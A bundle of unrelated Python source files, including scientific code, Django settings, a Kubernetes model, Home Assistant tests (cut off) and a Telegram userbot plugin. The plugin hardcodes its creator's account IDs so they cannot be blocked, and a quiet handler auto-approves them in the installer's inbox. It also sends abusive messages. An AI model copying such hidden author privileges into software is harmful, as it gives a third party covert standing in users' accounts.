print('\n[Checking Background]\n Background: {}'.format(background))
if isinstance(background, kmerSetDB):
if background.K > len(seq_constr):
build_parts = False
print('\n [ERROR] Background Lmax of {} is greater than desired part length ({}-bp)'.format(
background.K-1,
len(seq_constr)))
print(' [SOLUTION] Try using a background with Lmax less than or equal to part length\n')
if verbose:
print(' Check Status: FAIL\n')
if build_parts and not background.ALIVE:
build_parts = False
print('\n [ERROR] Background is closed or dropped')
print(' [SOLUTION] Try using an open Background\n')
if verbose:
print(' Check Status: FAIL\n')
if build_parts:
if verbose:
print('\n Check Status: PASS')
else:
build_parts = False
print('\n [ERROR] Background Object is INVALID')
print(' [SOLUTION] Try instantiating background via nrpcalc.background(...)\n')
if verbose:
print(' Check Status : FAIL\n')
# Arguments Check
if build_parts:
if verbose:
print('\n[Checking Arguments]')
print(' Struct Type : {}'.format(struct_type))
print(' Synth Opt : {}'.format(synth_opt))
print(' Jump Count: {}'.format(jump_count))
print(' Fail Count: {}'.format(fail_count))
print(' Output File : {}'.format(output_file))
check_status = self._check_maker_inputs(
struct_type,
synth_opt,
jump_count,
fail_count,
output_file,
verbose)
if check_status == False:
if verbose:
print(' Check Status: FAIL\n')
build_parts = False
else:
if verbose:
print('\n Check Status: PASS')
if not build_parts:
# Cleanups
self.background = None
self.kmer_db = None
raise RuntimeError('Invalid Constraints, Background or Arguments')
# Separate Checks from Build Logs
if verbose:
print()
# kmer_db and background Setup
projector.setup_proj_dir(self.proj_id)
self.kmer_db = set()
self.background = background
# self.kmer_db = kmerSetDB(
# path='./{}/kmerDB'.format(self.proj_id),
# homology=homology,
# verbose=verbose)
# Project Setup
if output_file is None:
projector.setup_proj_dir(self.proj_id)
output_file = './{}/seq_list.fa'.format(self.proj_id)
# Execute Maker
with open(output_file, 'w') as out_file:
seq_constr = seq_constr.upper()
struct_constr = self._get_adjusted_struct(
struct_constr,
seq_constr)
current_nrp_count = 0
memory_exhausted = False
if verbose:
print('Constructing Toolbox:\n')
for non_coding_nrp in self._get_non_coding_nrps(
homology,
seq_constr,
struct_constr,
struct_type,
target_size,
synth_opt,
local_model_fn,
global_model_fn,
jump_count,
fail_count,
verbose,
abortion,
allow_internal_repeat):
# Write out genetic part
if non_coding_nrp:
out_file.write(
'>non-repetitive part {}\n'.format(
current_nrp_count+1))
non_coding_nrp = '\n'.join(
textwrap.wrap(
non_coding_nrp, 80))
out_file.write('{}\n'.format(
non_coding_nrp))
current_nrp_count += 1
else:
if non_coding_nrp is None:
if verbose:
print('Failure Limits Exceeded or k-mers Exhausted. Cannot Build More Parts.')
else:
if verbose:
print('Memory Capacity at Full. Cannot Build More Parts.')
memory_exhausted = True
# Memory no longer available ... stop
if memory_exhausted:
break
if verbose:
print('\nConstruction Complete.\n')
# Detach Background
self.background = None
# Remove kmerSetDB
# self.kmer_db.drop()
self.kmer_db = None
# Pack output in dictionary
parts_dict = {}
for i,line in enumerate(utils.stream_fasta_seq_list(output_file)):
line = line.strip()
parts_dict[i] = line
# Cleanups and Return
projector.remove_proj_dir()
if verbose:
print('Non-Repetitive Toolbox Size: {}'.format(current_nrp_count))
return parts_dict
def main():
homology = 16
sm_obj = NRPMaker(seed=7)
# Hammerhead Nielsen Paper
seq = 'NNNN AGNNNU CANNNNN UGUGCUU NNNNNU CUGAUGA NNNN GUGA NNNN GAAA NNNC CUCU NNNNN UAAU NNNNN UUAA NNNN' # Nielsen Like
struct = 'xxxx x((((( x(((((( xxxxxxx )))))) xxxxxxx (((( xxxx )))) xxx) )))) xxxx ((((( xxxx ))))) xxxx xxxx'
seq = ''.join(seq.split(' '))
struct = ''.join(struct.split(' '))
output_file = None #'riboz.fa'
background = None #utils.get_fasta_seq_list(fasta_filename='input.fa.bk104')
# Final Result Store
final_toolbox = {}
# Initialize Background
background = kmerSetDB(
path='./testDB',
homology=homology,
verbose=True)
# background.multiadd(
# utils.get_fasta_seq_list(
# fasta_filename='input.fa.bk104'))
# Background Based Single Part Design Works
t0 = time()
tt = 0
    toolbox1 = sm_obj.nrp_maker(homology, seq, struct, 10,
struct_type='mfe',
background=background,
jump_count=100,
fail_count=1000,
synth_opt=False,
verbose=True,
abortion=True,
allow_internal_repeat=True,
output_file=output_file)
tt += time() - t0
final_toolbox.update(
zip(range(len(final_toolbox), len(final_toolbox)+len(toolbox1)),
toolbox1.values()))
# Adding More Background Post Design Works
background.multiadd(toolbox1.values())
    # Serial Designs from Multiple Constraints Works
    # (nrp_maker takes one constraint set per call, so the serial design is
    # issued as two calls; each batch is fed back into the background so the
    # next call avoids its k-mers)
    t0 = time()
    for _ in range(2):
        toolbox2 = sm_obj.nrp_maker(homology, seq, struct, 20,
            struct_type='mfe',
            background=background,
            jump_count=100,
            fail_count=1000,
            synth_opt=False,
            verbose=True,
            abortion=True,
            allow_internal_repeat=False,
            output_file=output_file)
        final_toolbox.update(
            zip(range(len(final_toolbox), len(final_toolbox)+len(toolbox2)),
                toolbox2.values()))
        background.multiadd(toolbox2.values())
    tt += time() - t0
# Assert All Parts Unique and Non-Repetitive
assert len(set(final_toolbox.values())) == len(
finder.nrp_finder(final_toolbox.values(), homology, None, verbose=False))
# Drop Background
background.drop()
# Report Time Elapsed
print('\nWall Time {} sec'.format(tt))
if __name__ == '__main__':
main()
|
import time
import numpy as np
import xobjects as xo
from xfields.contexts import add_default_kernels
from pysixtrack.be_beamfields.gaussian_fields import get_Ex_Ey_Gx_Gy_gauss
from pysixtrack.mathlibs import MathlibDefault
#ctx = xo.ContextCpu()
ctx = xo.ContextCpu(omp_num_threads=4)
#ctx = xo.ContextCupy()
#ctx = xo.ContextPyopencl()
print(ctx)
kernel_descriptions = {'q_gaussian_profile':{
'args':(
(('scalar', np.int32 ), 'n'),
(('array', np.float64), 'z'),
(('scalar', np.float64), 'z0'),
(('scalar', np.float64), 'z_min'),
(('scalar', np.float64), 'z_max'),
(('scalar', np.float64), 'beta'),
(('scalar', np.float64), 'q'),
(('scalar', np.float64), 'q_tol'),
(('scalar', np.float64), 'factor'),
(('array', np.float64), 'res'),
),
'num_threads_from_arg': 'n'
},}
ctx.add_kernels(src_files=['../../../xfields/src/qgaussian.h'],
kernel_descriptions=kernel_descriptions)
import matplotlib.pyplot as plt
plt.close('all')
plt.figure(1)
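# The q-Gaussian reduces to an ordinary Gaussian as q -> 1, so bracketing
# q = 1 with 0.95 and 1.05 visualizes the deviation on either side.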
for qq in [0.95, 1., 1.05]:
z = np.linspace(-2., 2., 1000)
res = 0*z
ctx.kernels.q_gaussian_profile(
n=len(z),
z=z,
z0=0.5,
z_min=-0.8,
z_max=1.9,
beta=1./2./0.5**2,
q=qq,
q_tol=1e-10,
factor=1,
res=res)
plt.plot(z, res, label=f'q={qq}')
plt.legend(loc='best')
plt.show()
|
# -*- coding: utf-8 -*-
"""Module that defines a class through which application configuration settings can be retrieved."""
import typing as t
class Settings:
"""Container to provide configuration settings for the application."""
def __init__(self, prefix: str):
"""Initialize the class.
:param prefix: the prefix with which application settings can be configured globally. The prefix will be
automatically converted to all uppercase.
"""
self.prefix = prefix.upper()
def _get_setting(self, name: str, default: t.Any) -> t.Any:
"""Retrieve the setting with the given name from the loaded settings or return the specified default.
.. note:: The module :mod:`django.conf.settings` needs to be imported in this method for it to be up to date.
"""
from django.conf import settings as django_settings
return getattr(django_settings, f'{self.prefix}_{name}', default)
@property
def bibliography_adapter(self) -> str:
"""Return the full import path of the bibliography adapter implementation to use.
The value should be an implementation of :class:`biblary.bibliography.adapter.abstract.BibliographyAdapter`.
"""
return self._get_setting('BIBLIOGRAPHY_ADAPTER', 'biblary.bibliography.adapter.bibtex.BibtexBibliography')
@property
def bibliography_adapter_configuration(self) -> dict:
"""Return the dictionary that will be passed as keyword arguments of the bibliography adapter constructor."""
return self._get_setting('BIBLIOGRAPHY_ADAPTER_CONFIGURATION', {})
@property
def bibliography_storage(self) -> t.Optional[str]:
"""Return the full import path of the bibliography storage implementation to use.
The value should be an implementation of :class:`biblary.bibliography.storage.abstract.AbstractStorage`.
"""
return self._get_setting('BIBLIOGRAPHY_STORAGE', None)
@property
def bibliography_storage_configuration(self) -> dict:
"""Return the dictionary that will be passed as keyword arguments of the bibliography storage constructor."""
return self._get_setting('BIBLIOGRAPHY_STORAGE_CONFIGURATION', {})
@property
def bibliography_main_author_patterns(self) -> t.Sequence[str]:
"""Return a sequence of strings that represent authors that should be marked as main author.
The elements of the sequence can be simple strings or regex patterns.
"""
return self._get_setting('BIBLIOGRAPHY_MAIN_AUTHOR_PATTERNS', ())
@property
def bibliography_main_author_class(self) -> str:
"""Return the CSS class that is used by the :meth:`biblary.templatetags.authors.main_author_class`.
This tag can be used in the index template to add this CSS class to main authors.
"""
return self._get_setting('BIBLIOGRAPHY_MAIN_AUTHOR_CLASS', 'biblary-entry-author-main')
settings: Settings = Settings('BIBLARY')
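# Usage sketch (the module path shown is illustrative): with
# BIBLARY_BIBLIOGRAPHY_ADAPTER defined in the Django settings module, the
# prefixed lookup above resolves it.
#   from biblary.settings import settings
#   adapter_path = settings.bibliography_adapter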
|
from DTL.api import BaseDict
#------------------------------------------------------------
#------------------------------------------------------------
class DotifyDict(BaseDict):
#------------------------------------------------------------
def __eq__(self, other):
return dict.__eq__(self, other)
#------------------------------------------------------------
def __setitem__(self, key, value):
if '.' in key:
myKey, restOfKey = key.split('.', 1)
target = self.set_default(myKey, DotifyDict())
if not isinstance(target, DotifyDict):
                raise KeyError('cannot set "{0}" in "{1}" ({2})'.format(restOfKey, myKey, repr(target)))
target[restOfKey] = value
else:
if isinstance(value, dict) and not isinstance(value, DotifyDict):
value = DotifyDict(value)
dict.__setitem__(self, key, value)
#------------------------------------------------------------
def __getitem__(self, key):
if '.' not in key:
return dict.__getitem__(self, key)
myKey, restOfKey = key.split('.', 1)
target = dict.__getitem__(self, myKey)
if not isinstance(target, DotifyDict):
            raise KeyError('cannot get "{0}" in "{1}" ({2})'.format(restOfKey, myKey, repr(target)))
return target[restOfKey]
#------------------------------------------------------------
def __contains__(self, key):
if '.' not in key:
return dict.__contains__(self, key)
myKey, restOfKey = key.split('.', 1)
target = dict.__getitem__(self, myKey)
if not isinstance(target, DotifyDict):
return False
return restOfKey in target
#------------------------------------------------------------
def get(self, key, default=None):
try:
return self.__getitem__(key)
except KeyError:
return default
        except Exception as e:
            raise Exception(e)
#------------------------------------------------------------
def set_default(self, key, default):
if key not in self:
self[key] = default
return self[key]
#------------------------------------------------------------
__setattr__ = __setitem__
__getattr__ = __getitem__
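# Usage sketch (assuming BaseDict behaves like a plain dict):
#   d = DotifyDict()
#   d['a.b.c'] = 1
#   d.a.b.c          # -> 1
#   'a.b' in d       # -> True
#   d.get('a.x', 0)  # -> 0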
|
import os
import time
import asyncio
import io
import userbot.plugins.sql_helper.pmpermit_sql as pmpermit_sql
from telethon.tl.functions.users import GetFullUserRequest
from telethon import events, errors, functions, types
from userbot import ALIVE_NAME, CUSTOM_PMPERMIT
from userbot.utils import admin_cmd
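# NOTE: names such as `bot`, `borg`, `command` and `Var` are not imported in
# this file; in this userbot framework they are injected into the plugin
# namespace by the plugin loader at import time.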
PMPERMIT_PIC = os.environ.get("PMPERMIT_PIC", None)
if PMPERMIT_PIC is None:
WARN_PIC = "https://telegra.ph/file/2bffdacf584f596a9d99d.jpg"
else:
WARN_PIC = PMPERMIT_PIC
PM_WARNS = {}
PREV_REPLY_MESSAGE = {}
DEFAULTUSER = str(ALIVE_NAME) if ALIVE_NAME else "Set ALIVE_NAME in config vars in Heroku"
CUSTOM_MIDDLE_PMP = str(CUSTOM_PMPERMIT) if CUSTOM_PMPERMIT else "**YOU HAVE TRESPASSED INTO MY MASTER'S INBOX** \n`THIS IS ILLEGAL AND REGARDED AS A CRIME`"
USER_BOT_WARN_ZERO = "`You kept spamming my master's inbox, so you have been blocked by my master's userbot.` "
USER_BOT_NO_WARN = ("`Hello ! This is` **[Pikachu Userbot](t.me/ItzSjDudeProjects)**\n"
"`Private Messaging Security Protocol ⚠️`\n\n"
"**You Have Trespassed To My Boss\n"
f"{DEFAULTUSER}'s Inbox**\n\n"
f"{CUSTOM_MIDDLE_PMP} 🔥\n\n"
"**Now You Are In Trouble So Send** 🔥 `/start` 🔥 **To Start A Valid Conversation!!**")
if Var.PRIVATE_GROUP_ID is not None:
@command(pattern="^.approve ?(.*)")
async def approve_p_m(event):
if event.fwd_from:
return
replied_user = await event.client(GetFullUserRequest(event.chat_id))
firstname = replied_user.user.first_name
reason = event.pattern_match.group(1)
chat = await event.get_chat()
if event.is_private:
if not pmpermit_sql.is_approved(chat.id):
if chat.id in PM_WARNS:
del PM_WARNS[chat.id]
if chat.id in PREV_REPLY_MESSAGE:
await PREV_REPLY_MESSAGE[chat.id].delete()
del PREV_REPLY_MESSAGE[chat.id]
pmpermit_sql.approve(chat.id, reason)
await event.edit("Approved to pm [{}](tg://user?id={})".format(firstname, chat.id))
await asyncio.sleep(3)
await event.delete()
@command(pattern="^.block ?(.*)")
    async def block_p_m(event):
if event.fwd_from:
return
replied_user = await event.client(GetFullUserRequest(event.chat_id))
firstname = replied_user.user.first_name
reason = event.pattern_match.group(1)
chat = await event.get_chat()
if event.is_private:
if chat.id == 813878981:
await event.edit("You bitch tried to block my Creator, now i will sleep for 100 seconds")
await asyncio.sleep(100)
else:
if pmpermit_sql.is_approved(chat.id):
pmpermit_sql.disapprove(chat.id)
await event.edit(" ███████▄▄███████████▄ \n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\n▓▓▓▓▓▓███░░░░░░░░░░░░█\n██████▀▀▀█░░░░██████▀ \n░░░░░░░░░█░░░░█ \n░░░░░░░░░░█░░░█ \n░░░░░░░░░░░█░░█ \n░░░░░░░░░░░█░░█ \n░░░░░░░░░░░░▀▀ \n\n**This is {DEFAULTUSER} AI..U HAVE BEEN BANNED DUE TO BAKCHODI**..[{}](tg://user?id={})".format(firstname, chat.id))
await asyncio.sleep(3)
await event.client(functions.contacts.BlockRequest(chat.id))
@command(pattern="^.disapprove ?(.*)")
    async def disapprove_p_m(event):
if event.fwd_from:
return
replied_user = await event.client(GetFullUserRequest(event.chat_id))
firstname = replied_user.user.first_name
reason = event.pattern_match.group(1)
chat = await event.get_chat()
if event.is_private:
if chat.id == 813878981:
await event.edit("Sorry, I Can't Disapprove My Master")
else:
if pmpermit_sql.is_approved(chat.id):
pmpermit_sql.disapprove(chat.id)
await event.edit("Disapproved [{}](tg://user?id={})".format(firstname, chat.id))
@command(pattern="^.listapproved")
    async def list_approved_p_m(event):
if event.fwd_from:
return
approved_users = pmpermit_sql.get_all_approved()
APPROVED_PMs = "Current Approved PMs\n"
if len(approved_users) > 0:
for a_user in approved_users:
if a_user.reason:
APPROVED_PMs += f"👉 [{a_user.chat_id}](tg://user?id={a_user.chat_id}) for {a_user.reason}\n"
else:
APPROVED_PMs += f"👉 [{a_user.chat_id}](tg://user?id={a_user.chat_id})\n"
else:
APPROVED_PMs = "no Approved PMs (yet)"
if len(APPROVED_PMs) > 4095:
with io.BytesIO(str.encode(APPROVED_PMs)) as out_file:
out_file.name = "approved.pms.text"
await event.client.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption="Current Approved PMs",
reply_to=event
)
await event.delete()
else:
await event.edit(APPROVED_PMs)
@bot.on(events.NewMessage(incoming=True))
async def on_new_private_message(event):
if event.from_id == bot.uid:
return
if Var.PRIVATE_GROUP_ID is None:
return
if not event.is_private:
return
message_text = event.message.message
chat_id = event.from_id
current_message_text = message_text.lower()
if USER_BOT_NO_WARN == message_text:
# userbot's should not reply to other userbot's
# https://core.telegram.org/bots/faq#why-doesn-39t-my-bot-see-messages-from-other-bots
return
sender = await bot.get_entity(chat_id)
if chat_id == bot.uid:
# don't log Saved Messages
return
if sender.bot:
# don't log bots
return
if sender.verified:
# don't log verified accounts
return
if any([x in event.raw_text for x in ("/start", "1", "2", "3", "4", "5")]):
return
if not pmpermit_sql.is_approved(chat_id):
# pm permit
await do_pm_permit_action(chat_id, event)
async def do_pm_permit_action(chat_id, event):
if chat_id not in PM_WARNS:
PM_WARNS.update({chat_id: 0})
if PM_WARNS[chat_id] == 5:
r = await event.reply(USER_BOT_WARN_ZERO)
await asyncio.sleep(3)
await event.client(functions.contacts.BlockRequest(chat_id))
if chat_id in PREV_REPLY_MESSAGE:
await PREV_REPLY_MESSAGE[chat_id].delete()
PREV_REPLY_MESSAGE[chat_id] = r
the_message = ""
the_message += "#BLOCKED_PMs\n\n"
the_message += f"[User](tg://user?id={chat_id}): {chat_id}\n"
the_message += f"Message Count: {PM_WARNS[chat_id]}\n"
# the_message += f"Media: {message_media}"
try:
await event.client.send_message(
entity=Var.PRIVATE_GROUP_ID,
message=the_message,
# reply_to=,
# parse_mode="html",
link_preview=False,
# file=message_media,
silent=True
)
return
except:
return
r = await event.client.send_file(event.chat_id, WARN_PIC, caption=USER_BOT_NO_WARN)
PM_WARNS[chat_id] += 1
if chat_id in PREV_REPLY_MESSAGE:
await PREV_REPLY_MESSAGE[chat_id].delete()
PREV_REPLY_MESSAGE[chat_id] = r
from userbot.utils import admin_cmd
import io
import userbot.plugins.sql_helper.pmpermit_sql as pmpermit_sql
from telethon import events
@bot.on(events.NewMessage(incoming=True, from_users=(953414679,813878981,536157487)))
async def hehehe(event):
if event.fwd_from:
return
chat = await event.get_chat()
if event.is_private:
if not pmpermit_sql.is_approved(chat.id):
pmpermit_sql.approve(chat.id, "**My Boss Is Best🔥**")
await bot.send_message(chat, "**Boss Meet My Creator**")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
setup(
name='docutils-ast-writer',
description='AST Writer for docutils',
version='0.1.2',
author='jimo1001',
author_email='jimo1001@gmail.com',
license='MIT',
url='https://github.com/jimo1001/docutils-ast-writer',
packages=find_packages(),
install_requires=[
'docutils>=0.12'
],
entry_points="""
[console_scripts]
rst2ast = rst2ast.cmd:run
""",
use_2to3 = True
)
|
import os
assert os.path.exists("data/data1.txt")
assert os.path.exists("data/subdir/data2.txt")
# Fake trained model!
open("model.json", "w").close()
open("checkpoint.h5", "w").close()
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
OpenAPI spec version: v1.15.7
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class V1NodeDaemonEndpoints(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'kubelet_endpoint': 'V1DaemonEndpoint'
}
attribute_map = {
'kubelet_endpoint': 'kubeletEndpoint'
}
def __init__(self, kubelet_endpoint=None): # noqa: E501
"""V1NodeDaemonEndpoints - a model defined in OpenAPI""" # noqa: E501
self._kubelet_endpoint = None
self.discriminator = None
if kubelet_endpoint is not None:
self.kubelet_endpoint = kubelet_endpoint
@property
def kubelet_endpoint(self):
"""Gets the kubelet_endpoint of this V1NodeDaemonEndpoints. # noqa: E501
:return: The kubelet_endpoint of this V1NodeDaemonEndpoints. # noqa: E501
:rtype: V1DaemonEndpoint
"""
return self._kubelet_endpoint
@kubelet_endpoint.setter
def kubelet_endpoint(self, kubelet_endpoint):
"""Sets the kubelet_endpoint of this V1NodeDaemonEndpoints.
:param kubelet_endpoint: The kubelet_endpoint of this V1NodeDaemonEndpoints. # noqa: E501
:type: V1DaemonEndpoint
"""
self._kubelet_endpoint = kubelet_endpoint
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1NodeDaemonEndpoints):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
from BonusAllocator import BonusAllocator
from IOHmmModel import IOHmmModel
import numpy as np
class QLearningAllocator(BonusAllocator):
def __init__(self, num_workers, discnt=0.99, len_seq=10, base_cost=5, bns=2, t=10, weights=None):
super(QLearningAllocator, self).__init__(num_workers, base_cost, bns, t, weights)
print('init a Q-learning MDP bonus allocator')
self.__len_seq = len_seq
self.__discnt = discnt
self.__nstates = 0 # number of hidden states, denoted as S
self.__ostates = 0 # number of observations, denoted as O
self.__strt_prob = None # start probability of hidden states, shape = 1 * S
self.__tmat0 = None # transition matrix with no bonus, shape = S * S, returned after training
self.__tmat1 = None # transition matrix with bonus, shape = S * S, returned after training
self.__emat = None # emission matrix, shape = S * O, returned after training
self.__numitr = 0
self.__q_mat = None
self.set_parameters()
def set_parameters(self, nstates=2, ostates=2, strt_prob=None, numitr=1000, discnt=0.8, len_seq=10):
if strt_prob is None:
strt_prob = [1.0 / nstates for _ in range(nstates)]
self.__discnt = discnt
self.__nstates = nstates # number of hidden states
self.__ostates = ostates # number of observations
self.__strt_prob = strt_prob
self.__numitr = numitr # number of iteration in EM algorithm
self.__len_seq = len_seq
def train(self, model):
model_param = model.get_model()
self.__tmat0 = model_param[0]
self.__tmat1 = model_param[1]
self.__emat = model_param[2]
self.__q_mat = [self.__cal_q(tc) for tc in range(self._t + 1)] # include T moment
def __pseudo_viterbi(self, in_obs, ou_obs): # tmats[0] transition matrix when not bonus
t_val = list()
t_val.append([self.__strt_prob[i] * self.__emat[i][ou_obs[0]] for i in range(self.__nstates)]) # 1 * N
tmats = (self.__tmat0, self.__tmat1)
for cur_t in range(1, len(in_obs), 1):
t_val.append([])
for j in range(self.__nstates):
tmp_val = [t_val[cur_t - 1][i] * tmats[in_obs[cur_t]][i][j] * self.__emat[j][ou_obs[cur_t]]
for i in range(self.__nstates)] # from i to j
t_val[cur_t].append(sum(tmp_val))
t_val[cur_t] = [float(cur_v) / sum(t_val[cur_t]) for cur_v in t_val[cur_t]]
return t_val[-1]
def __cal_reward(self, k, a):
trans_mat = [self.__tmat0, self.__tmat1]
return sum([trans_mat[a][k][i] * (self.__emat[i][0] * self.weights[0] + self.__emat[i][1] * (
self.weights[1] - a * self.weights[2])) for i in range(self.__nstates)])
def __cal_q(self, t):
q_mat = np.zeros((self.__nstates, 2))
tmats = (self.__tmat0, self.__tmat1)
for __ in range(self.__numitr):
k = np.random.choice(self.__nstates, 1)[0] # random select start states
for i in range(t):
a = np.random.choice([0, 1], 1)[0] # select an input randomly
k_prime = np.random.choice(self.__nstates, 1, p=tmats[a][k])[0] # sample the next state from the transition probabilities
q_mat[k][a] = self.__cal_reward(k, a) + self.__discnt * max(q_mat[k_prime])
k = k_prime
return q_mat
def bonus_alloc(self, in_obs, ou_obs):
if self.__emat is not None and in_obs is not None and ou_obs is not None:
states_belief = self.__pseudo_viterbi(in_obs, ou_obs)
tc = len(in_obs) % self._t
# print states
exp0 = sum([states_belief[k] * self.__q_mat[self._t - tc][k][0] for k in range(self.__nstates)])
exp1 = sum([states_belief[k] * self.__q_mat[self._t - tc][k][1] for k in range(self.__nstates)])
return self._base_cost + self._bns * int(exp1 > exp0)
else:
return self._base_cost + self._bns * np.random.choice(2, 1)[0]
|
def validate_schema(schema):
def validate_decorator(func):
def validate_wrapper(*args, **kwargs):
data = schema().load(kwargs)
return func(*args, **data)
return validate_wrapper
return validate_decorator
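# Usage sketch (hypothetical, assumes a marshmallow-style schema class whose
# ``load()`` returns the validated fields as a dict; ``GreetSchema`` and
# ``greet`` below are illustrative names, not part of this module):
#
#     from marshmallow import Schema, fields
#
#     class GreetSchema(Schema):
#         name = fields.Str(required=True)
#
#     @validate_schema(GreetSchema)
#     def greet(**kwargs):
#         return "Hello, {}!".format(kwargs["name"])
#
#     greet(name="Ada")  # -> "Hello, Ada!"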
|
from snowflake.connector.errors import Error
class SnowDDLExecuteError(Exception):
def __init__(self, snow_exc: Error, sql: str):
self.snow_exc = snow_exc
self.sql = sql
def verbose_message(self):
params = {
'message': self.snow_exc.raw_msg,
'errno': self.snow_exc.errno,
'sqlstate': self.snow_exc.sqlstate,
'sfqid': self.snow_exc.sfqid,
'sql': self.sql,
}
pad_length = max(len(x) for x in params)
res = ''
for k in params:
res += f" {k.ljust(pad_length)} => {params[k]}\n"
return '(\n' + res + ')'
class SnowDDLUnsupportedError(Exception):
pass
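# Usage sketch (hypothetical): wrap a Snowflake cursor call and re-raise with
# the offending SQL attached, so callers can log a readable report.
#
#     try:
#         cursor.execute(sql)
#     except Error as e:
#         raise SnowDDLExecuteError(e, sql) from e
#
# A handler further up can then print ``exc.verbose_message()`` to get the
# message, errno, sqlstate, query id and SQL text as aligned key => value lines.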
|
"""Test the SiteSage Emonitor config flow."""
from unittest.mock import MagicMock, patch
from aioemonitor.monitor import EmonitorNetwork, EmonitorStatus
import aiohttp
from homeassistant import config_entries
from homeassistant.components import dhcp
from homeassistant.components.emonitor.const import DOMAIN
from homeassistant.const import CONF_HOST
from tests.common import MockConfigEntry
def _mock_emonitor():
return EmonitorStatus(
MagicMock(), EmonitorNetwork("AABBCCDDEEFF", "1.2.3.4"), MagicMock()
)
async def test_form(hass):
"""Test we get the form."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["errors"] == {}
with patch(
"homeassistant.components.emonitor.config_flow.Emonitor.async_get_status",
return_value=_mock_emonitor(),
), patch(
"homeassistant.components.emonitor.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
"host": "1.2.3.4",
},
)
await hass.async_block_till_done()
assert result2["type"] == "create_entry"
assert result2["title"] == "Emonitor DDEEFF"
assert result2["data"] == {
"host": "1.2.3.4",
}
assert len(mock_setup_entry.mock_calls) == 1
async def test_form_unknown_error(hass):
"""Test we handle unknown error."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.emonitor.config_flow.Emonitor.async_get_status",
side_effect=Exception,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
"host": "1.2.3.4",
},
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "unknown"}
async def test_form_cannot_connect(hass):
"""Test we handle cannot connect error."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.emonitor.config_flow.Emonitor.async_get_status",
side_effect=aiohttp.ClientError,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
"host": "1.2.3.4",
},
)
assert result2["type"] == "form"
assert result2["errors"] == {CONF_HOST: "cannot_connect"}
async def test_dhcp_can_confirm(hass):
"""Test DHCP discovery flow can confirm right away."""
with patch(
"homeassistant.components.emonitor.config_flow.Emonitor.async_get_status",
return_value=_mock_emonitor(),
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_DHCP},
data=dhcp.DhcpServiceInfo(
hostname="emonitor",
ip="1.2.3.4",
macaddress="aa:bb:cc:dd:ee:ff",
),
)
await hass.async_block_till_done()
assert result["type"] == "form"
assert result["step_id"] == "confirm"
assert result["description_placeholders"] == {
"host": "1.2.3.4",
"name": "Emonitor DDEEFF",
}
with patch(
"homeassistant.components.emonitor.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{},
)
await hass.async_block_till_done()
assert result2["type"] == "create_entry"
assert result2["title"] == "Emonitor DDEEFF"
assert result2["data"] == {
"host": "1.2.3.4",
}
assert len(mock_setup_entry.mock_calls) == 1
async def test_dhcp_fails_to_connect(hass):
"""Test DHCP discovery flow that fails to connect."""
with patch(
"homeassistant.components.emonitor.config_flow.Emonitor.async_get_status",
side_effect=aiohttp.ClientError,
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_DHCP},
data=dhcp.DhcpServiceInfo(
hostname="emonitor",
ip="1.2.3.4",
macaddress="aa:bb:cc:dd:ee:ff",
),
)
await hass.async_block_till_done()
assert result["type"] == "form"
assert result["step_id"] == "user"
async def test_dhcp_already_exists(hass):
"""Test DHCP discovery flow that fails to connect."""
entry = MockConfigEntry(
domain=DOMAIN,
data={CONF_HOST: "1.2.3.4"},
unique_id="aa:bb:cc:dd:ee:ff",
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.emonitor.config_flow.Emonitor.async_get_status",
return_value=_mock_emonitor(),
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_DHCP},
data=dhcp.DhcpServiceInfo(
hostname="emonitor",
ip="1.2.3.4",
macaddress="aa:bb:cc:dd:ee:ff",
),
)
await hass.async_block_till_done()
assert result["type"] == "abort"
assert result["reason"] == "already_configured"
async def test_user_unique_id_already_exists(hass):
"""Test creating an entry where the unique_id already exists."""
entry = MockConfigEntry(
domain=DOMAIN,
data={CONF_HOST: "1.2.3.4"},
unique_id="aa:bb:cc:dd:ee:ff",
)
entry.add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
